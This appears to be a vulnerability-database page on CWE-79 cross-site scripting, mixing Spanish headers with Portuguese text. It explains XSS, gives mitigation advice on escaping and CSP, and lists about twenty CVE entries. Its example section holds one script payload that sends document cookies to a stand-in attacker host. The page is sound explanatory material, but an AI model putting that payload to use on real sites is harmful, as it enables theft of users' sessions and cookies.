Fallos del tipo CWE-79

28.949 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2021-36910LOWWordPress WP-Appbox plugin <= 4.3.20 - Authenticated Stored Cross-Site Scripting (XSS) vulnerabilityEPSS 0.6%CVE-2024-2683LOWCampcodes Online Job Finder System index.php cross site scriptingEPSS 0.6%CVE-2024-11202MEDIUMMultiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide ShortcodeEPSS 0.6%CVE-2024-55601MEDIUMHugo does not escape some attributes in internal templatesEPSS 0.6%CVE-2023-1302LOWSourceCodester File Tracker Manager System borrow1.php cross site scriptingEPSS 0.6%CVE-2024-2680LOWCampcodes Online Job Finder System index.php cross site scriptingEPSS 0.6%CVE-2021-36893MEDIUMWordPress Responsive Tabs plugin <= 4.0.5 - Cross-Site Scripting (XSS) vulnerabilityEPSS 0.6%CVE-2021-24895—Cybersoldier < 1.7.0 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2023-24181MEDIUMLuCI openwrt-22.03 branch git-22.361.69894-438c598 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the coEPSS 0.6%CVE-2026-73546HIGHEnvoy: Stored XSS in Admin Stats Interface (/stats?format=html)EPSS 0.6%CVE-2022-0701—SEO 301 Meta <= 1.9.1 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-0874—WP Social Buttons <= 2.1 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2021-24896—Caldera forms < 1.9.5 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2021-24944—Custom Dashboard & Login Page < 7.0 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-0389—WP Time Slots Booking Form < 1.1.63 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-0840—Easy Social Icons < 3.2.1 - Admin+ Stored Cross-Site Scripting in add iconEPSS 0.6%CVE-2021-24902—Typebot < 1.4.3 - Admin+ Stored Cross Site ScriptingEPSS 0.6%CVE-2021-32668MEDIUMCross-Site Scripting in Query Generator & Query ViewEPSS 0.6%CVE-2022-0728—Easy Smooth Scroll Links < 2.23.1 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-1088—Page Security & Membership <= 1.5.15 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%